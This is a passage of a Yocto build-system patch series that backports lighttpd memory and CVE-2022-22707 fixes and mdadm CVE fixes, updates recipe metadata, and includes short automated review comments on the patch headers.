--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
1From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 1From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com> 2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Fri, 26 Aug 2016 18:20:32 +0300 3Date: Fri, 26 Aug 2016 18:20:32 +0300
4Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. 4Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
6RP 2014/5/22 6RP 2014/5/22
7Upstream-Status: Pending 7Upstream-Status: Pending
8Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> 8Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
9
9--- 10---
10 configure.ac | 16 ++++++++++++---- 11 configure.ac | 16 ++++++++++++----
11 1 file changed, 12 insertions(+), 4 deletions(-) 12 1 file changed, 12 insertions(+), 4 deletions(-)
12 13
13diff --git a/configure.ac b/configure.ac 14diff --git a/configure.ac b/configure.ac
14index 5383cec..c29a902 100644 15index dbddfb9..62cf17f 100644
15--- a/configure.ac 16--- a/configure.ac
16+++ b/configure.ac 17+++ b/configure.ac
17@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], 18@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
18 ) 19 )
19 AC_MSG_RESULT([$WITH_PCRE]) 20 AC_MSG_RESULT([$WITH_PCRE])
20 21
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
37 else 38 else
38 AC_PATH_PROG([PCRECONFIG], [pcre-config]) 39 AC_PATH_PROG([PCRECONFIG], [pcre-config])
39 if test -n "$PCRECONFIG"; then 40 if test -n "$PCRECONFIG"; then
40--
412.15.0
42
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
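--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+ "Memory Growth with PUT and full buffered streams"
+ https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backword compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h | 2 +
+ src/http-header-glue.c | 2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++ size_t x = 1024;
++ while (x < sz && x < (1u << 30)) x <<= 1;
++ chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++ chunk_buf_sz = 8192;
+ chunkqueue_default_tempdirs = NULL;
+ chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ free(c);
+ }
+
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++ /* future: might have buckets of certain sizes, up to socket buf sizes */
++ if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++ --chunks_oversized_n;
++ chunk *c = chunks_oversized;
++ chunks_oversized = c->next;
++ return c;
++ }
++ return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++ ++chunks_oversized_n;
++ chunk **co = &chunks_oversized;
++ while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++ c->next = *co;
++ *co = c;
++ }
++ else
++ chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+ chunk *c;
+ buffer *b;
+- if (chunks) {
+- c = chunks;
+- chunks = c->next;
++ if (sz <= chunk_buf_sz) {
++ if (chunks) {
++ c = chunks;
++ chunks = c->next;
++ }
++ else
++ c = chunk_init(chunk_buf_sz);
++ /* future: might choose to pop from chunks_oversized, if available
++ * (even if larger than sz) rather than allocating new chunk
++ * (and if doing so, might replace chunks_oversized_n) */
+ }
+ else {
+- c = chunk_init(chunk_buf_sz);
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ c = chunk_pop_oversized(sz);
++ if (NULL == c)
++ c = chunk_init(sz);
+ }
+ c->next = chunk_buffers;
+ chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+ return b;
+ }
+
++buffer * chunk_buffer_acquire(void) {
++ return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+ if (NULL == b) return;
+- if (b->size >= chunk_buf_sz && chunk_buffers) {
++ if (chunk_buffers) {
+ chunk *c = chunk_buffers;
+ chunk_buffers = c->next;
+ c->mem = b;
+- c->next = chunks;
+- chunks = c;
+ buffer_clear(b);
++ if (b->size == chunk_buf_sz) {
++ c->next = chunks;
++ chunks = c;
++ }
++ else if (b->size > chunk_buf_sz)
++ chunk_push_oversized(c, b->size);
++ else
++ chunk_free(c);
+ }
+ else {
+ buffer_free(b);
+ }
+ }
+
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++ if (sz > chunk_buffer_string_space(b)) {
++ sz += b->used ? b->used : 1;
++ buffer * const cb = chunk_buffer_acquire_sz(sz);
++ /* swap buffer contents and copy original b->ptr into larger b->ptr */
++ /*(this does more than buffer_move())*/
++ buffer tb = *b;
++ *b = *cb;
++ *cb = tb;
++ if ((b->used = tb.used))
++ memcpy(b->ptr, tb.ptr, tb.used);
++ chunk_buffer_release(cb);
++ }
++ return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+ if (sz <= chunk_buf_sz) {
+ if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+ sz = chunk_buf_sz;
+ }
+ else {
+- sz = (sz + 8191) & ~8191uL;
+- /* future: might have buckets of certain sizes, up to socket buf sizes*/
+- if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+- chunk *c = chunks_oversized;
+- chunks_oversized = c->next;
+- return c;
+- }
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ chunk *c = chunk_pop_oversized(sz);
++ if (c) return c;
+ }
+
+ return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+ }
+ else if (sz > chunk_buf_sz) {
+ chunk_reset(c);
+- chunk **co = &chunks_oversized;
+- while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+- c->next = *co;
+- *co = c;
++ chunk_push_oversized(c, sz);
+ }
+ else {
+ chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+ chunk_free(c);
+ }
+ chunks_oversized = NULL;
++ chunks_oversized_n = 0;
+ }
+
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+ if (avail < toread) {
+ /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+ avail = avail ? avail - 1 + toread : toread;
+- buffer_string_prepare_append(b, avail);
++ avail = chunk_buffer_prepare_append(b, avail);
+ }
+
+ n = read(fd, b->ptr+buffer_string_length(b), avail);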
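Review bot: The header line `Comment: Hunk refreshed to make it backword compatible.` (patch line 19) says this backport differs from the upstream commit but not which hunk was altered or how, so a reader cannot tell the local change from upstream code without re-diffing against revision 7ba521ff. I would name the file and function that were adapted in that comment. The commit URL also sits on a line of its own rather than in the status field; the usual form is `Upstream-Status: Backport [https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337]`. The same applies to default-chunk-size-8k.patch, and the mod_extforward CVE-2022-22707 patch gives `Upstream-Status: Backport` with no commit reference at all.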
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
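--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded. lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+ "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+ https://redmine.lighttpd.net/issues/3134
+ (not yet written or published)
+ CVE-2022-22707
+
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+ while (s[i] == ' ' || s[i] == '\t') ++i;
+ if (s[i] == ';') { ++i; continue; }
+ if (s[i] == ',') {
+- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+ offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+ ++i;
+ continue;
+--
+2.25.1
+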
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
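--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)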
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Lightweight high-performance web server" 1SUMMARY = "Lightweight high-performance web server"
2HOMEPAGE = "http://www.lighttpd.net/" 2HOMEPAGE = "http://www.lighttpd.net/"
3DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
3BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" 4BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
4 5
5LICENSE = "BSD-3-Clause" 6LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
13 lighttpd-module-accesslog" 14 lighttpd-module-accesslog"
14 15
15SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ 16SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
17 file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
16 file://index.html.lighttpd \ 18 file://index.html.lighttpd \
17 file://lighttpd.conf \ 19 file://lighttpd.conf \
18 file://lighttpd \ 20 file://lighttpd \
19 file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ 21 file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
22 file://default-chunk-size-8k.patch \
23 file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
20 " 24 "
21 25
22SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" 26SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
1SUMMARY = "Rotates, compresses, removes and mails system log files" 1SUMMARY = "Rotates, compresses, removes and mails system log files"
2SECTION = "console/utils" 2SECTION = "console/utils"
3HOMEPAGE = "https://github.com/logrotate/logrotate/issues" 3HOMEPAGE = "https://github.com/logrotate/logrotate/"
4DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5 6
6# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? 7# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
21SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" 22SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
22SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" 23SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
23 24
25# These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used
26CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
27
24PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" 28PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
25 29
26PACKAGECONFIG[acl] = ",,acl" 30PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
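--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
+lsb-release maintains it's own copy of help2man. Include the support
+for specifying SOURCE_DATE_EPOCH from upstream.
+
+Upstream-Status: Pending
+
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+
+diff --git a/help2man b/help2man
+index 13015c2..63439db 100755
+--- a/help2man
++++ b/help2man
+@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
+ or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
+ } qw(help), $opt_version_key;
+
+-my $date = strftime "%B %Y", localtime;
++my $epoch_secs = time;
++if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
++{
++ $epoch_secs = $1;
++ $ENV{TZ} = 'UTC0';
++}
++
++my $date = strftime "%B %Y", localtime $epoch_secs;
+ (my $program = $ARGV[0]) =~ s!.*/!!;
+ my $package = $program;
+ my $version;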
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
11SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \ 11SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
12 file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \ 12 file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
13 file://0001-Remove-timestamp-from-manpage.patch \ 13 file://0001-Remove-timestamp-from-manpage.patch \
14 file://help2man-reproducibility.patch \
14 " 15 "
15 16
16SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4" 17SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
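--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
 Its name stands for LiSt Open Files, and it does just that."
 HOMEPAGE = "http://people.freebsd.org/~abe/"
 SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
 LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
 
 # Upstream lsof releases are hosted on an ftp server which times out download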
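--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
 CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
 SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
 
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
  file://0001-build-Add-option-to-select-libc-implementation.patch \
  file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
  file://0004-guard-mallocopt-with-__GLIBC__.patch \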
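--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Lossless data compressor based on the LZMA algorithm"
 HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
+DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
 SECTION = "console/utils"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \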
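--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
 HOMEPAGE = "http://man-db.nongnu.org/"
+DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
 LICENSE = "LGPLv2.1 & GPLv2"
 LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
  file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"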
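--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Midnight Commander is an ncurses based file manager"
 HOMEPAGE = "http://www.midnight-commander.org/"
+DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
 SECTION = "console/utils"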
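--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
+From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
+From: Blazej Kucman <blazej.kucman@intel.com>
+Date: Fri, 3 Dec 2021 15:31:15 +0100
+Subject: mdadm: block creation with long names
+
+This fixes buffer overflows in create_mddev(). It prohibits
+creation with not supported names for DDF and native. For IMSM,
+mdadm will do silent cut to 16 later.
+
+Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
+Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
+CVE: CVE-2023-28736
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ mdadm.8.in | 5 +++++
+ mdadm.c | 9 ++++++++-
+ mdadm.h | 5 +++++
+ 3 files changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/mdadm.8.in b/mdadm.8.in
+index 28d773c2..68e100cb 100644
+--- a/mdadm.8.in
++++ b/mdadm.8.in
+@@ -2186,6 +2186,11 @@ is run, but will be created by
+ .I udev
+ once the array becomes active.
+
++The max length md-device name is limited to 32 characters.
++Different metadata types have more strict limitation
++(like IMSM where only 16 characters are allowed).
++For that reason, long name could be truncated or rejected, it depends on metadata policy.
++
+ As devices are added, they are checked to see if they contain RAID
+ superblocks or filesystems. They are also checked to see if the variance in
+ device size exceeds 1%.
+diff --git a/mdadm.c b/mdadm.c
+index 91e67467..26299b2e 100644
+--- a/mdadm.c
++++ b/mdadm.c
+@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
+ mdfd = open_mddev(devlist->devname, 1);
+ if (mdfd < 0)
+ exit(1);
+- } else
++ } else {
++ char *bname = basename(devlist->devname);
++
++ if (strlen(bname) > MD_NAME_MAX) {
++ pr_err("Name %s is too long.\n", devlist->devname);
++ exit(1);
++ }
+ /* non-existent device is OK */
+ mdfd = open_mddev(devlist->devname, 0);
++ }
+ if (mdfd == -2) {
+ pr_err("device %s exists but is not an md array.\n", devlist->devname);
+ exit(1);
+diff --git a/mdadm.h b/mdadm.h
+index 54567396..c7268a71 100644
+--- a/mdadm.h
++++ b/mdadm.h
+@@ -1880,3 +1880,8 @@ enum r0layout {
+ #define INVALID_SECTORS 1
+ /* And another special number needed for --data_offset=variable */
+ #define VARIABLE_OFFSET 3
++
++/**
++ * This is true for native and DDF, IMSM allows 16.
++ */
++#define MD_NAME_MAX 32
+--
+cgit
+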
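Review bot: The length check added to mdadm.c sits in the `else` branch of main(), while the commit message locates the overflow in create_mddev(), so any other path that reaches create_mddev() with a long name is not covered by what this hunk shows; main() starts and ends outside the hunk, so this needs checking against the full source. `strlen(bname) > MD_NAME_MAX` accepts a name of exactly 32 characters, which is only safe if the destination buffers hold at least 33 bytes. A comment beside the define, such as `/* MD_NAME_MAX excludes the terminating NUL; buffers need MD_NAME_MAX + 1 */`, would make that contract explicit.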
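--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
+From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
+From: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Date: Tue, 27 Jul 2021 10:25:18 +0200
+Subject: Fix memory leak after "mdadm --detail"
+
+Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
+CVE: CVE-2023-28938
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Detail.c | 20 +++++++++-----------
+ 1 file changed, 9 insertions(+), 11 deletions(-)
+
+diff --git a/Detail.c b/Detail.c
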